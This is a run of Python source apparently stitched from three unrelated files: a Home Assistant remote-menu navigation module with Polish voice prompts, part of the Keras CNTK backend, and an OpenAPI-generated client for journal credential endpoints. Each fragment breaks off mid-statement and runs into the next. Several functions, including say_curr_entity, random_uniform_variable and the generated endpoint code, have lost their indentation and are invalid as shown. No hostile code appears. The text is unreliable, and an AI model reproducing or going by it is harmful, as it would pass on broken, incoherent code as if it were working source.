    """Decrease the edited hour by one (0 wraps to 23) and announce it."""
    global G_INPUT_CURRENT_HOUR
    global G_INPUT_CURRENT_MINNUTE
    if G_INPUT_CURRENT_HOUR is None:
        # first key press: seed the edit buffer from the entity's attributes
        time_attr = hass.states.get(entity_id).attributes
        G_INPUT_CURRENT_HOUR = time_attr.get("hour", 0)
        G_INPUT_CURRENT_MINNUTE = time_attr.get("minute", 0)
    G_INPUT_CURRENT_HOUR = 23 if G_INPUT_CURRENT_HOUR == 0 else G_INPUT_CURRENT_HOUR - 1
    _say_it(hass, get_hour_to_say(G_INPUT_CURRENT_HOUR, G_INPUT_CURRENT_MINNUTE))
def set_time_minute_up(hass, entity_id):
    """Increase the edited minute by one (59 wraps to 0) and announce it."""
    global G_INPUT_CURRENT_HOUR
    global G_INPUT_CURRENT_MINNUTE
    if G_INPUT_CURRENT_HOUR is None:
        # first key press: seed the edit buffer from the entity's attributes
        time_attr = hass.states.get(entity_id).attributes
        G_INPUT_CURRENT_HOUR = time_attr.get("hour", 0)
        G_INPUT_CURRENT_MINNUTE = time_attr.get("minute", 0)
    G_INPUT_CURRENT_MINNUTE = 0 if G_INPUT_CURRENT_MINNUTE == 59 else G_INPUT_CURRENT_MINNUTE + 1
    _say_it(hass, get_hour_to_say(G_INPUT_CURRENT_HOUR, G_INPUT_CURRENT_MINNUTE))
def set_time_minute_down(hass, entity_id):
    """Decrease the edited minute by one (0 wraps to 59) and announce it."""
    global G_INPUT_CURRENT_HOUR
    global G_INPUT_CURRENT_MINNUTE
    if G_INPUT_CURRENT_HOUR is None:
        # first key press: seed the edit buffer from the entity's attributes
        time_attr = hass.states.get(entity_id).attributes
        G_INPUT_CURRENT_HOUR = time_attr.get("hour", 0)
        G_INPUT_CURRENT_MINNUTE = time_attr.get("minute", 0)
    G_INPUT_CURRENT_MINNUTE = 59 if G_INPUT_CURRENT_MINNUTE == 0 else G_INPUT_CURRENT_MINNUTE - 1
    _say_it(hass, get_hour_to_say(G_INPUT_CURRENT_HOUR, G_INPUT_CURRENT_MINNUTE))
def remove_selected_action(key_code):
    """Drop the remembered entity action unless the pressed key keeps it valid."""
    global CURR_ENTITIE_SELECTED_ACTION
    # key codes 19-23 keep a pending action alive -- presumably navigation
    # keys; TODO confirm against the key-event handler
    if key_code not in (19, 20, 21, 22, 23):
        CURR_ENTITIE_SELECTED_ACTION = None
        return
    shuffle_action = CURR_ENTITIE_SELECTED_ACTION == ais_global.G_ACTION_SET_AUDIO_SHUFFLE
    if shuffle_action and key_code not in (19, 20, 23):
        CURR_ENTITIE_SELECTED_ACTION = None
# Groups in Groups views
def get_curr_group():
    """Return the focused group, lazily picking the first one in the current view."""
    global CURR_GROUP
    if CURR_GROUP is None:
        view = get_curr_group_view()
        CURR_GROUP = next(
            (g for g in GROUP_ENTITIES if g["remote_group_view"] == view), None
        )
    return CURR_GROUP
def get_group_from_group(entity_id):
    """Focus the group with the given entity_id and return it.

    NOTE(review): when no group matches, the previously focused group is
    returned unchanged -- same as the original fall-through.
    """
    global CURR_GROUP
    match = next((g for g in GROUP_ENTITIES if g["entity_id"] == entity_id), None)
    if match is not None:
        CURR_GROUP = match
    return CURR_GROUP
def get_curr_group_idx():
    """Return the index of the focused group within GROUP_ENTITIES."""
    curr_id = get_curr_group()["entity_id"]
    for idx, group in enumerate(GROUP_ENTITIES):
        if group["entity_id"] == curr_id:
            return idx
    # not found: mirror the original fall-through (index == len(GROUP_ENTITIES))
    return len(GROUP_ENTITIES)
def say_curr_group(hass):
    """Read the focused group's friendly name aloud."""
    group = get_curr_group()
    _say_it(hass, group["friendly_name"])
def set_bookmarks_curr_group(hass):
    """Move menu focus to the bookmarks group (group.ais_bookmarks)."""
    # idiom fix: the enumerate() index was never used -- iterate directly
    for g in GROUP_ENTITIES:
        if g["entity_id"] == "group.ais_bookmarks":
            set_curr_group(hass, g)
            return
def set_favorites_curr_group(hass):
    """Move menu focus to the favorites group (group.ais_favorites)."""
    # idiom fix: the enumerate() index was never used -- iterate directly
    for g in GROUP_ENTITIES:
        if g["entity_id"] == "group.ais_favorites":
            set_curr_group(hass, g)
            return
def set_curr_group(hass, group):
    """Focus the given menu group (or the default one) and sync related state.

    group: a GROUP_ENTITIES entry, or None to fall back to the current group.
    Side effects: clears the entity selection, publishes the selected group
    on binary_sensor.selected_entity (None case), and updates the audio
    player display mode for audio-related groups.
    """
    # set focus on current menu group view
    global CURR_GROUP_VIEW
    global CURR_GROUP
    global CURR_ENTITIE
    global CURR_ENTITIE_ENTERED
    global CURR_ENTITIE_POSITION
    # the entitie can be selected or focused
    CURR_ENTITIE = None
    CURR_ENTITIE_ENTERED = False
    CURR_ENTITIE_POSITION = None
    if group is None:
        CURR_GROUP = get_curr_group()
        hass.states.async_set("binary_sensor.selected_entity", CURR_GROUP["entity_id"])
    else:
        CURR_GROUP_VIEW = group["remote_group_view"]
        CURR_GROUP = group
    # set display context for mega audio player
    # NOTE(review): "sensor.ais_drives" is the one non-group id in this
    # list -- looks intentional (drive browser), confirm with callers.
    if CURR_GROUP["entity_id"] in (
        "group.radio_player",
        "group.podcast_player",
        "group.music_player",
        "group.ais_bookmarks",
        "group.ais_rss_news_remote",
        "group.local_audio",
        "sensor.ais_drives",
        "group.ais_favorites",
        "group.audiobooks_player",
    ):
        hass.states.async_set(
            "sensor.ais_player_mode", CURR_GROUP["entity_id"].replace("group.", "")
        )
def set_next_group(hass):
    """Focus the next group within the current view, wrapping to the first."""
    # set focus on next group in focused view
    global CURR_GROUP
    first_group_in_view = None
    curr_group_in_view = None
    next_group_in_view = None
    for group in GROUP_ENTITIES:
        if group["remote_group_view"] == get_curr_group_view():
            # select the first group
            if curr_group_in_view is not None and next_group_in_view is None:
                # first in-view group seen after the current one
                next_group_in_view = group
            if first_group_in_view is None:
                first_group_in_view = group
            if CURR_GROUP["entity_id"] == group["entity_id"]:
                curr_group_in_view = group
    if next_group_in_view is not None:
        CURR_GROUP = next_group_in_view
    else:
        # current group was last (or not in view): wrap to the first
        CURR_GROUP = first_group_in_view
    # to reset
    set_curr_group(hass, CURR_GROUP)
def set_prev_group(hass):
    """Focus the previous group within the current view, wrapping to the last."""
    # set focus on prev group in focused view
    global CURR_GROUP
    last_group_in_view = None
    curr_group_in_view = None
    prev_group_in_view = None
    for group in GROUP_ENTITIES:
        if group["remote_group_view"] == get_curr_group_view():
            # select the last group
            last_group_in_view = group
            if CURR_GROUP["entity_id"] == group["entity_id"]:
                curr_group_in_view = group
            if curr_group_in_view is None:
                # keep updating until the current group is found
                prev_group_in_view = group
    if prev_group_in_view is not None:
        CURR_GROUP = prev_group_in_view
    else:
        # current group was first (or not in view): wrap to the last
        CURR_GROUP = last_group_in_view
    # to reset
    set_curr_group(hass, CURR_GROUP)
# entity in group
def get_curr_entity():
    """Return the focused entity, defaulting to the group's first entity."""
    global CURR_ENTITIE
    if CURR_ENTITIE is None:
        entities = GROUP_ENTITIES[get_curr_group_idx()]["entities"]
        if entities:
            CURR_ENTITIE = entities[0]
    return CURR_ENTITIE
def get_curr_entity_idx():
    """Return the focused entity's index in its group (None when not found)."""
    target = get_curr_entity()
    entities = GROUP_ENTITIES[get_curr_group_idx()]["entities"]
    for idx, item in enumerate(entities):
        if item == target:
            return idx
    # implicit None on fall-through, matching the original behaviour
def set_curr_entity(hass, entity):
    """Focus the given entity (or the default one) and publish the selection."""
    global CURR_ENTITIE
    global CURR_ENTITIE_POSITION
    CURR_ENTITIE = get_curr_entity() if entity is None else entity
    CURR_ENTITIE_POSITION = None
    hass.states.async_set("binary_sensor.selected_entity", CURR_ENTITIE)
def set_next_entity(hass):
    """Focus the next entity in the current group and announce it.

    The music group has a hard-coded focus cycle whose path depends on the
    selected music service (Spotify vs. the default/YouTube path).
    """
    # set next entity
    global CURR_ENTITIE
    # special case for music
    if CURR_ENTITIE == "input_select.ais_music_service":
        state = hass.states.get("input_select.ais_music_service")
        if state.state == "Spotify":
            CURR_ENTITIE = "input_text.ais_spotify_query"
        else:
            CURR_ENTITIE = "input_text.ais_music_query"
    elif CURR_ENTITIE == "input_text.ais_music_query":
        CURR_ENTITIE = "sensor.youtubelist"
    elif CURR_ENTITIE == "input_text.ais_spotify_query":
        CURR_ENTITIE = "sensor.spotifysearchlist"
    elif CURR_ENTITIE == "sensor.youtubelist":
        CURR_ENTITIE = "input_select.ais_music_service"
    elif CURR_ENTITIE == "sensor.spotifysearchlist":
        CURR_ENTITIE = "sensor.spotifylist"
    elif CURR_ENTITIE == "sensor.spotifylist":
        CURR_ENTITIE = "input_select.ais_music_service"
    else:
        # generic case: step to the next entity in the group, wrapping
        entity_idx = get_curr_entity_idx()
        group_idx = get_curr_group_idx()
        l_group_len = len(GROUP_ENTITIES[group_idx]["entities"])
        if entity_idx + 1 == l_group_len:
            entity_idx = 0
        else:
            entity_idx = entity_idx + 1
        CURR_ENTITIE = GROUP_ENTITIES[group_idx]["entities"][entity_idx]
    # to reset variables
    set_curr_entity(hass, None)
    say_curr_entity(hass)
def set_prev_entity(hass):
    """Focus the previous entity in the current group and announce it.

    Mirror of set_next_entity(); the music group uses the same hard-coded
    cycle traversed in the opposite direction.
    """
    # set prev entity
    global CURR_ENTITIE
    # special case for music
    if CURR_ENTITIE == "input_select.ais_music_service":
        state = hass.states.get("input_select.ais_music_service")
        if state.state == "Spotify":
            CURR_ENTITIE = "sensor.spotifylist"
        else:
            CURR_ENTITIE = "sensor.youtubelist"
    elif CURR_ENTITIE == "sensor.youtubelist":
        CURR_ENTITIE = "input_text.ais_music_query"
    elif CURR_ENTITIE == "input_text.ais_music_query":
        CURR_ENTITIE = "input_select.ais_music_service"
    elif CURR_ENTITIE == "sensor.spotifylist":
        CURR_ENTITIE = "sensor.spotifysearchlist"
    elif CURR_ENTITIE == "sensor.spotifysearchlist":
        CURR_ENTITIE = "input_text.ais_spotify_query"
    elif CURR_ENTITIE == "input_text.ais_spotify_query":
        CURR_ENTITIE = "input_select.ais_music_service"
    # end special case for music
    else:
        # generic case: step back one entity in the group, wrapping
        idx = get_curr_entity_idx()
        l_group_len = len(GROUP_ENTITIES[get_curr_group_idx()]["entities"])
        if idx == 0:
            idx = l_group_len - 1
        else:
            idx = idx - 1
        CURR_ENTITIE = GROUP_ENTITIES[get_curr_group_idx()]["entities"][idx]
    # to reset variables
    set_curr_entity(hass, None)
    say_curr_entity(hass)
def say_curr_entity(hass):
# check if we have selected item
entity_id = get_curr_entity()
if entity_id is None:
if CURR_GROUP["entity_id"] == "group.all_ais_persons":
_say_it(
hass,
"Brak informacji o osobach. W konfiguracji możesz dodać osoby, "
"oraz urządzenia raportujące lokalizację osób.",
)
elif CURR_GROUP["entity_id"] == "group.all_automations":
_say_it(
hass,
"Brak zdefiniowanych automatyzacji. Dodaj automatyzację w konfiguracji.",
)
else:
_say_it(hass, "Brak pozycji")
return
state = hass.states.get(entity_id)
if state is None:
_say_it(hass, "Brak pozycji")
return
text = state.attributes.get("text")
info_name = state.attributes.get("friendly_name")
info_data = state.state
info_unit = state.attributes.get("unit_of_measurement")
if not text:
text = ""
# handle special cases...
if entity_id == "sensor.aisknowledgeanswer":
_say_it(hass, "Odpowiedź: " + text)
return
elif entity_id == "sensor.ais_drives":
state = hass.states.get("sensor.ais_drives")
if state.state is None or state.state == "":
_say_it(hass, "dysk wewnętrzny")
else:
attr = state.attributes
files = attr.get("files", [])
info = ais_drives_service.get_pozycji_variety(len(files))
_say_it(hass, info)
return
elif | |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cntk as C
import numpy as np
from .common import floatx, epsilon, image_dim_ordering, image_data_format
from collections import defaultdict
from contextlib import contextmanager
import warnings
C.set_global_option('align_axis', 1)
# keep a handle on the builtin any(); presumably shadowed by a backend-level
# any() defined later in this module -- TODO confirm
b_any = any
dev = C.device.use_default_device()
if dev.type() == 0:  # 0 == CPU device (per the warning text below)
    warnings.warn(
        'CNTK backend warning: GPU is not detected. '
        'CNTK\'s CPU version is not fully optimized,'
        'please run with GPU to get better performance.')
# A learning phase is a bool tensor used to run Keras models in
# either train mode (learning_phase == 1) or test mode (learning_phase == 0).
# LEARNING_PHASE_PLACEHOLDER is the placeholder for dynamic learning phase
_LEARNING_PHASE_PLACEHOLDER = C.constant(shape=(), dtype=np.float32, value=1.0, name='_keras_learning_phase')
# static learning phase flag, if it is not 0 or 1, we will go with dynamic learning phase tensor.
_LEARNING_PHASE = -1
_UID_PREFIXES = defaultdict(int)  # per-prefix counters backing get_uid()
# cntk doesn't support gradient as symbolic op, to hook up with keras model,
# we will create gradient as a constant placeholder, here use this global
# map to keep the mapping from grad placeholder to parameter
grad_parameter_dict = {}
NAME_SCOPE_STACK = []  # active name_scope() names, outermost first
@contextmanager
def name_scope(name):
    """Context manager that pushes `name` onto the global name-scope stack.

    BUG FIX: the pop is now in a try/finally so an exception raised inside
    the `with` body no longer leaves a stale scope on NAME_SCOPE_STACK.
    """
    global NAME_SCOPE_STACK
    NAME_SCOPE_STACK.append(name)
    try:
        yield
    finally:
        NAME_SCOPE_STACK.pop()
def get_uid(prefix=''):
    """Return the next sequential uid (starting at 1) for `prefix`."""
    next_uid = _UID_PREFIXES[prefix] + 1
    _UID_PREFIXES[prefix] = next_uid
    return next_uid
def learning_phase():
    """Return the static phase flag (0/1) or the dynamic phase tensor."""
    if _LEARNING_PHASE in {0, 1}:
        return _LEARNING_PHASE
    return _LEARNING_PHASE_PLACEHOLDER
def set_learning_phase(value):
    """Set the static learning phase; only 0 (test) or 1 (train) is allowed."""
    global _LEARNING_PHASE
    if value in {0, 1}:
        _LEARNING_PHASE = value
        return
    raise ValueError('CNTK Backend: Set learning phase '
                     'with value %s is not supported, '
                     'expected 0 or 1.' % value)
def clear_session():
    """Reset the learning-phase flag and placeholder to their defaults."""
    global _LEARNING_PHASE
    global _LEARNING_PHASE_PLACEHOLDER
    _LEARNING_PHASE = -1  # -1 means "use the dynamic phase tensor"
    _LEARNING_PHASE_PLACEHOLDER.value = np.asarray(1.0)
def in_train_phase(x, alt, training=None):
    """Select `x` during training and `alt` otherwise.

    x, alt: tensors or zero-argument callables returning tensors.
    training: 0/1, bool, or a phase tensor; defaults to the global
        learning phase when omitted.
    """
    global _LEARNING_PHASE
    if training is None:
        training = learning_phase()
        uses_learning_phase = True
    else:
        uses_learning_phase = False
    # CNTK currently don't support cond op, so here we use
    # element_select approach as workaround. It may have
    # perf issue, will resolve it later with cntk cond op.
    if callable(x) and isinstance(x, C.cntk_py.Function) is False:
        x = x()
    if callable(alt) and isinstance(alt, C.cntk_py.Function) is False:
        alt = alt()
    if training is True:
        x._uses_learning_phase = uses_learning_phase
        return x
    else:
        # if _LEARNING_PHASE is static
        if isinstance(training, int) or isinstance(training, bool):
            result = x if training == 1 or training is True else alt
        else:
            # dynamic phase: element-wise select driven by the phase tensor
            result = C.element_select(training, x, alt)
        result._uses_learning_phase = uses_learning_phase
        return result
def in_test_phase(x, alt, training=None):
    """Select `x` in test phase; mirror of in_train_phase with args swapped."""
    return in_train_phase(alt, x, training=training)
def _convert_string_dtype(dtype):
    """Map a dtype name to a numpy dtype; CNTK only supports float32/float64."""
    supported = {'float32': np.float32, 'float64': np.float64}
    # anything else is coerced to float32 so the model can still run
    return supported.get(dtype, np.float32)
def _convert_dtype_string(dtype):
    """Inverse of _convert_string_dtype; raises for non-float dtypes."""
    if dtype == np.float32:
        return 'float32'
    if dtype == np.float64:
        return 'float64'
    raise ValueError('CNTK Backend: Unsupported dtype: %s. '
                     'CNTK only supports float32 and '
                     'float64.' % dtype)
def variable(value, dtype=None, name=None, constraint=None):
    """Instantiates a variable and returns it.
    # Arguments
        value: Numpy array, initial value of the tensor.
        dtype: Tensor type.
        name: Optional name string for the tensor.
        constraint: Optional projection function to be
            applied to the variable after an optimizer update.
    # Returns
        A variable instance (with Keras metadata included).
    """
    if dtype is None:
        dtype = floatx()
    if name is None:
        name = ''
    # unwrap an existing CNTK Constant/Parameter down to its numpy value
    if isinstance(
            value,
            C.variables.Constant) or isinstance(
            value,
            C.variables.Parameter):
        value = value.value
    # we don't support init parameter with symbolic op, so eval it first as
    # workaround
    if isinstance(value, C.cntk_py.Function):
        value = eval(value)  # the backend's eval(), not the builtin
    shape = value.shape if hasattr(value, 'shape') else ()
    # cast non-scalar data whose dtype disagrees with the requested one
    if hasattr(value, 'dtype') and value.dtype != dtype and len(shape) > 0:
        value = value.astype(dtype)
    # TODO: remove the conversion when cntk supports int32, int64
    # https://docs.microsoft.com/en-us/python/api/cntk.variables.parameter
    dtype = 'float32' if 'int' in str(dtype) else dtype
    v = C.parameter(shape=shape,
                    init=value,
                    dtype=dtype,
                    name=_prepare_name(name, 'variable'))
    # Keras metadata expected throughout the framework
    v._keras_shape = v.shape
    v._uses_learning_phase = False
    v.constraint = constraint
    return v
def bias_add(x, bias, data_format=None):
    """Add a bias tensor to `x`, reshaping the bias so it broadcasts correctly.

    x: tensor of rank 2-4 (an optional leading inferred batch axis is ignored
        when counting rank).
    bias: rank-1 bias, or a bias of the same rank as `x`.
    data_format: 'channels_first' or 'channels_last'; defaults to the Keras
        global image_data_format().
    Raises ValueError for unknown data_format or mismatched bias rank.
    """
    if data_format is None:
        data_format = image_data_format()
    if data_format not in {'channels_first', 'channels_last'}:
        raise ValueError('Unknown data_format ' + str(data_format))
    dims = len(x.shape)
    # ignore a leading inferred (batch) dimension when counting rank
    if dims > 0 and x.shape[0] == C.InferredDimension:
        dims -= 1
    bias_dims = len(bias.shape)
    if bias_dims != 1 and bias_dims != dims:
        raise ValueError('Unexpected bias dimensions %d, '
                         'expected 1 or %d dimensions' % (bias_dims, dims))
    # Build the broadcast shape for the bias. For channels_first a rank-1
    # bias goes on the leading axis; for a full-rank bias the trailing
    # (channel) axis is rotated to the front.
    if dims == 4:
        if data_format == 'channels_first':
            if bias_dims == 1:
                shape = (bias.shape[0], 1, 1, 1)
            else:
                shape = (bias.shape[3],) + bias.shape[:3]
        elif data_format == 'channels_last':
            if bias_dims == 1:
                shape = (1, 1, 1, bias.shape[0])
            else:
                shape = bias.shape
    elif dims == 3:
        if data_format == 'channels_first':
            if bias_dims == 1:
                shape = (bias.shape[0], 1, 1)
            else:
                shape = (bias.shape[2],) + bias.shape[:2]
        elif data_format == 'channels_last':
            if bias_dims == 1:
                shape = (1, 1, bias.shape[0])
            else:
                shape = bias.shape
    elif dims == 2:
        if data_format == 'channels_first':
            if bias_dims == 1:
                shape = (bias.shape[0], 1)
            else:
                shape = (bias.shape[1],) + bias.shape[:1]
        elif data_format == 'channels_last':
            if bias_dims == 1:
                shape = (1, bias.shape[0])
            else:
                shape = bias.shape
    else:
        shape = bias.shape
    return x + reshape(bias, shape)
def eval(x):
    """Evaluate a CNTK Function or return the value of a Constant/Parameter.

    NOTE: intentionally shadows the builtin eval() within this backend module.
    """
    if isinstance(x, C.cntk_py.Function):
        return x.eval()
    if isinstance(x, (C.variables.Constant, C.variables.Parameter)):
        return x.value
    raise ValueError('CNTK Backend: `eval` method on '
                     '`%s` type is not supported. '
                     'CNTK only supports `eval` with '
                     '`Function`, `Constant` or '
                     '`Parameter`.' % type(x))
def placeholder(
        shape=None,
        ndim=None,
        dtype=None,
        sparse=False,
        name=None,
        dynamic_axis_num=1):
    """Instantiate a CNTK input placeholder.

    shape: full shape including dynamic (batch/sequence) axes as None.
    ndim: alternative to `shape` -- number of all-dynamic dimensions.
    dtype: dtype name; defaults to floatx().
    sparse: whether the input is sparse.
    name: optional tensor name.
    dynamic_axis_num: how many leading axes are dynamic (stripped from the
        static CNTK shape).
    """
    if dtype is None:
        dtype = floatx()
    if not shape:
        if ndim:
            shape = tuple([None for _ in range(ndim)])
    dynamic_dimension = C.FreeDimension if _get_cntk_version() >= 2.2 else C.InferredDimension
    cntk_shape = [dynamic_dimension if s is None else s for s in shape]
    cntk_shape = tuple(cntk_shape)
    if dynamic_axis_num > len(cntk_shape):
        # BUG FIX: len() was previously called as
        # len(cntk_shape, dynamic_axis_num), which raises TypeError
        # instead of the intended ValueError.
        raise ValueError('CNTK backend: creating placeholder with '
                         '%d dimension is not supported, at least '
                         '%d dimensions are needed.'
                         % (len(cntk_shape), dynamic_axis_num))
    if name is None:
        name = ''
    # drop the dynamic axes; CNTK tracks them separately on the input
    cntk_shape = cntk_shape[dynamic_axis_num:]
    x = C.input(
        shape=cntk_shape,
        dtype=_convert_string_dtype(dtype),
        is_sparse=sparse,
        name=name)
    # Keras metadata
    x._keras_shape = shape
    x._uses_learning_phase = False
    x._cntk_placeholder = True
    return x
def is_placeholder(x):
    """Returns whether `x` is a placeholder.
    # Arguments
        x: A candidate placeholder.
    # Returns
        Boolean.
    """
    return getattr(x, '_cntk_placeholder', False)
def is_keras_tensor(x):
    """Return True if `x` is a Keras-created tensor; raise for non-tensors."""
    if not is_tensor(x):
        raise ValueError('Unexpectedly found an instance of type `%s`. '
                         'Expected a symbolic tensor instance.' % type(x))
    return hasattr(x, '_keras_history')
def is_tensor(x):
    """Return True if `x` is a CNTK constant, variable, parameter or function."""
    tensor_types = (C.variables.Constant,
                    C.variables.Variable,
                    C.variables.Parameter,
                    C.ops.functions.Function)
    return isinstance(x, tensor_types)
def shape(x):
    """Return x's shape as a list, resolving static dims where CNTK knows them."""
    sym_shape = list(int_shape(x))
    num_dynamic = _get_dynamic_axis_num(x)
    resolved = sym_shape[:num_dynamic]
    for axis in range(len(x.shape)):
        known = sym_shape[axis + num_dynamic]
        # fall back to CNTK's own static dimension when Keras has None
        resolved.append(x.shape[axis] if known is None else known)
    return resolved
def is_sparse(tensor):
    """Return the tensor's sparse flag."""
    return tensor.is_sparse
def int_shape(x):
    """Return x's shape as a tuple, with None standing in for dynamic axes."""
    if hasattr(x, '_keras_shape'):
        return x._keras_shape
    static_shape = x.shape
    if hasattr(x, 'dynamic_axes'):
        # prepend one None per dynamic axis
        static_shape = tuple(None for _ in x.dynamic_axes) + static_shape
    return static_shape
def ndim(x):
    """Return the number of axes of `x`, dynamic axes included."""
    return len(int_shape(x))
def _prepare_name(name, default):
    """Prefix `name` (or `default` when name is empty/None) with active scopes."""
    prefix = '_'.join(NAME_SCOPE_STACK)
    chosen = name if name else default
    return prefix + '/' + chosen
def constant(value, dtype=None, shape=None, name=None):
    """Create a CNTK constant filled with `value`, tagged with Keras metadata."""
    dtype = floatx() if dtype is None else dtype
    np_value = value * np.ones(() if shape is None else shape)
    const = C.constant(np_value,
                       dtype=dtype,
                       name=_prepare_name(name, 'constant'))
    const._keras_shape = const.shape
    const._uses_learning_phase = False
    return const
def random_binomial(shape, p=0.0, dtype=None, seed=None):
    """Return a variable of Bernoulli(p) draws (numpy-based workaround).

    NOTE(review): reseeds numpy's global RNG as a side effect, matching the
    behaviour of the original implementation.
    """
    if seed is None:
        # ensure that randomness is conditioned by the Numpy RNG
        seed = np.random.randint(10e7)
    np.random.seed(seed)
    dtype = np.float32 if dtype is None else _convert_string_dtype(dtype)
    size = 1
    for dim in shape:
        if dim is None:
            raise ValueError('CNTK Backend: randomness op with '
                             'dynamic shape is not supported now. '
                             'Please provide fixed dimension '
                             'instead of `None`.')
        size *= dim
    draws = np.random.binomial(1, p, size).astype(dtype).reshape(shape)
    return variable(value=draws, dtype=dtype)
def random_uniform(shape, minval=0.0, maxval=1.0, dtype=None, seed=None):
    """Return a variable of uniform draws in [minval, maxval); shape must be static."""
    for dim in shape:
        if dim is None:
            raise ValueError('CNTK Backend: randomness op with '
                             'dynamic shape is not supported now. '
                             'Please provide fixed dimension '
                             'instead of `None`.')
    return random_uniform_variable(shape, minval, maxval, dtype, seed)
def random_uniform_variable(shape, low, high,
dtype=None, name=None, seed=None):
if dtype is None:
dtype = floatx()
if seed is None:
# ensure that randomness is conditioned by the Numpy RNG
seed = np.random.randint(10e3)
if dtype is None:
dtype = np.float32
else:
dtype = _convert_string_dtype(dtype)
if | |
without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
JournalCredential
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['journal_id'] = \
journal_id
kwargs['credential_id'] = \
credential_id
return self.call_with_http_info(**kwargs)
self.insight_project_journal_credential_get = _Endpoint(
settings={
'response_type': (JournalCredential,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/insight/{locationId}/project/{projectId}/journal/{journalId}/credential/{credentialId}',
'operation_id': 'insight_project_journal_credential_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'journal_id',
'credential_id',
],
'required': [
'project_id',
'location_id',
'journal_id',
'credential_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'journal_id':
(str,),
'credential_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'journal_id': 'journalId',
'credential_id': 'credentialId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'journal_id': 'path',
'credential_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__insight_project_journal_credential_get
)
def __insight_project_journal_credential_list(
    self,
    project_id,
    location_id,
    journal_id,
    **kwargs
):
    """List insight/journal.credential  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.insight_project_journal_credential_list(project_id, location_id, journal_id, async_req=True)
    >>> result = thread.get()

    Args:
        project_id (str): Project Id
        location_id (str): Location Id
        journal_id (str): Journal Id

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request;
            a single number or a (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        [JournalCredential]
        If the method is called asynchronously, returns the request thread.
    """
    # fill in every transport option the caller did not supply
    option_defaults = {
        'async_req': False,
        '_return_http_data_only': True,
        '_preload_content': True,
        '_request_timeout': None,
        '_check_input_type': True,
        '_check_return_type': True,
        '_host_index': None,
    }
    for option, default in option_defaults.items():
        kwargs[option] = kwargs.get(option, default)
    kwargs['project_id'] = project_id
    kwargs['location_id'] = location_id
    kwargs['journal_id'] = journal_id
    return self.call_with_http_info(**kwargs)
self.insight_project_journal_credential_list = _Endpoint(
settings={
'response_type': ([JournalCredential],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/insight/{locationId}/project/{projectId}/journal/{journalId}/credential',
'operation_id': 'insight_project_journal_credential_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'journal_id',
],
'required': [
'project_id',
'location_id',
'journal_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'journal_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'journal_id': 'journalId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'journal_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__insight_project_journal_credential_list
)
def __insight_project_journal_credential_patch(
self,
project_id,
location_id,
journal_id,
credential_id,
insight_project_journal_credential_patch,
**kwargs
):
"""Update insight/journal.credential # noqa: E501
Update insight/journal.credential # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.insight_project_journal_credential_patch(project_id, location_id, journal_id, credential_id, insight_project_journal_credential_patch, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
journal_id (str): Journal Id
credential_id (str): credentialId
insight_project_journal_credential_patch (InsightProjectJournalCredentialPatch):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
JournalCredential
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
